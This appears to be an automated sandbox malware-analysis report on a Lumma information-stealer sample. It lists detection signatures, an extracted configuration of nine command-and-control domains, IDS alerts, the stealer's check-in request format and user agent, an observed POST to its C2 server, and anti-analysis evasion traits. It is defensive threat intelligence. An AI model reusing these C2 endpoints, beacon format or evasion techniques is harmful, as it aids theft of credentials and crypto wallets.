Edit tour

Windows Analysis Report
gEfWplq0xQ.exe

Overview

General Information

Sample name:	gEfWplq0xQ.exe renamed because original name is a hash value
Original sample name:	414752ce11385194a5232f820b8480ea.exe
Analysis ID:	1578904
MD5:	414752ce11385194a5232f820b8480ea
SHA1:	139911b44c24685ee4903eb56bab51231beb9acb
SHA256:	7241e85bfd8d29f7291f7d485daa63d28749e128a14e27f686bb632dcd33ba1d
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

gEfWplq0xQ.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\gEfWplq0xQ.exe" MD5: 414752CE11385194A5232F820B8480EA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sweepyribs.lat", "aspecteirs.lat", "crosshuaht.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:21.220924+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:23.391854+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.21.99	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:21.983345+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.21.99	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:21.983345+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.21.99	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:21.220924+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.21.99	443	TCP
2024-12-20T16:31:23.391854+0100	2058361	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.21.99	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:19.792615+0100	2058360	1	Domain Observed Used for C2 Detected	192.168.2.5	59799	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:19.652395+0100	2058364	1	Domain Observed Used for C2 Detected	192.168.2.5	52460	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-20T16:31:19.425608+0100	2058378	1	Domain Observed Used for C2 Detected	192.168.2.5	59673	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: gEfWplq0xQ.exe

Avira: detected

Found malware configuration

Source: gEfWplq0xQ.exe.4712.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["sweepyribs.lat", "aspecteirs.lat", "crosshuaht.lat", "discokeyus.lat", "rapeflowwj.lat", "sustainskelet.lat", "necklacebudi.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "PsFKDg--pablo"}

Multi AV Scanner detection for submitted file

Source: gEfWplq0xQ.exe	Virustotal: Detection: 52%			Perma Link
Source: gEfWplq0xQ.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: gEfWplq0xQ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rapeflowwj.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: crosshuaht.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: sustainskelet.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: aspecteirs.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: energyaffai.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: necklacebudi.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: discokeyus.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: grannyejh.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: sweepyribs.lat
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2195343692.0000000000571000.00000040.00000001.01000000.00000003.sdmp	String decryptor: PsFKDg--pablo

Source: gEfWplq0xQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	0_2_005AC767
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	0_2_0057B70C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, esi	0_2_00592190
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00592190
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_2_00592190
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	0_2_00586263
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	0_2_005A85E0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then jmp eax	0_2_005A85E0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then jmp dword ptr [005B450Ch]	0_2_00588591
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov eax, dword ptr [005B473Ch]	0_2_0058C653
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0059A700
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	0_2_0058E7C0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov edx, ecx	0_2_005A8810
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	0_2_005A8810
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	0_2_005A8810
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then test eax, eax	0_2_005A8810
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0058682D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	0_2_0058682D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	0_2_0058682D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0059CA49
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0059CAD0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then push ebx	0_2_005ACA93
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0058CB40
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_0058CB40
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00598B61
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0059CB11
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0059CB22
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00596B95
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	0_2_005AECA0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	0_2_00598D93
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, eax	0_2_005AAEC0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	0_2_00578F50
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00578F50
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	0_2_005AEFB0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then push C0BFD6CCh	0_2_00593086
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then push C0BFD6CCh	0_2_00593086
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0059B170
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_005991DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	0_2_005991DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	0_2_005AB1D0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, eax	0_2_005AB1D0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	0_2_00585220
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0058B2E0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	0_2_005AF330
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	0_2_00587380
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	0_2_0058D380
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_005A5450
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	0_2_00587380
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_005991DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	0_2_005991DD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_005774F0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_005774F0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then xor edi, edi	0_2_0058759F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, eax	0_2_00579580
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	0_2_00579580
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx eax, word ptr [edx]	0_2_005897C2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_005897C2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_005897C2
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov esi, eax	0_2_00585799
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, eax	0_2_00585799
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then jmp eax	0_2_0059984F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	0_2_00593860
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0058D83A
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	0_2_005879C1
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, eax	0_2_00575990
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebp, eax	0_2_00575990
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0059DA53
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then push esi	0_2_00597AD3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, eax	0_2_0057DBD9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ebx, eax	0_2_0057DBD9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then push 00000000h	0_2_00599C2B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	0_2_00587DEE
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov edx, ebp	0_2_00595E70
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then jmp dword ptr [005B55F4h]	0_2_00595E30
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0058BF14
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	0_2_00589F30
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then jmp ecx	0_2_0057BFFD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 4x nop then mov ecx, ebx	0_2_0059DFE9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:59673 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:52460 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:59799 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49705 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49704 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.21.99:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sweepyribs.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: energyaffai.lat

Source: Joe Sandbox View

IP Address: 104.21.21.99 104.21.21.99

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.21.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.21.99:443

Source: global traffic

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: discokeyus.lat

Source: unknown

Source: gEfWplq0xQ.exe, 00000000.00000003.2182675432.000000000141A000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196191128.000000000135E000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/
Source: gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/Q
Source: gEfWplq0xQ.exe, 00000000.00000003.2182790946.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196191128.000000000135E000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196466531.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182732265.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196346869.00000000013C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/api
Source: gEfWplq0xQ.exe, 00000000.00000003.2182195588.0000000001420000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000002.2196502239.0000000001420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apin
Source: gEfWplq0xQ.exe, 00000000.00000002.2196466531.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182195588.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, gEfWplq0xQ.exe, 00000000.00000003.2182732265.00000000013D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discokeyus.lat/apip

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: gEfWplq0xQ.exe	Static PE information: section name:
Source: gEfWplq0xQ.exe	Static PE information: section name: .idata
Source: gEfWplq0xQ.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00578850	0_2_00578850
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068C071	0_2_0068C071
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00688075	0_2_00688075
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CA051	0_2_006CA051
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0068E03D	0_2_0068E03D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069E018	0_2_0069E018
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005EC028	0_2_005EC028
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0063E01E	0_2_0063E01E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E00ED	0_2_006E00ED
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006440E9	0_2_006440E9
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065E0FD	0_2_0065E0FD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F80F8	0_2_005F80F8
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006780C0	0_2_006780C0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069C0C5	0_2_0069C0C5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066A092	0_2_0066A092
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00630096	0_2_00630096
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BE096	0_2_006BE096
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005F615B	0_2_005F615B
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00734174	0_2_00734174
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006D8161	0_2_006D8161
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E4176	0_2_006E4176
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0066815C	0_2_0066815C
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0065C124	0_2_0065C124
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006BA12F	0_2_006BA12F
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A6121	0_2_006A6121
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005D810E	0_2_005D810E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00612138	0_2_00612138
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0063C104	0_2_0063C104
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_005941C0	0_2_005941C0
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006CE1CC	0_2_006CE1CC
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006E61CD	0_2_006E61CD
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006041C5	0_2_006041C5
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006AE1D3	0_2_006AE1D3
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00592190	0_2_00592190
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0061C184	0_2_0061C184
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00620199	0_2_00620199
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006A8195	0_2_006A8195
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0069C27D	0_2_0069C27D
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B4272	0_2_006B4272
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006C6258	0_2_006C6258
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_0064625E	0_2_0064625E
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00586263	0_2_00586263
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_006B2257	0_2_006B2257
Source: C:\Users\user\Desktop\gEfWplq0xQ.exe	Code function: 0_2_00662222	0_2_00662222
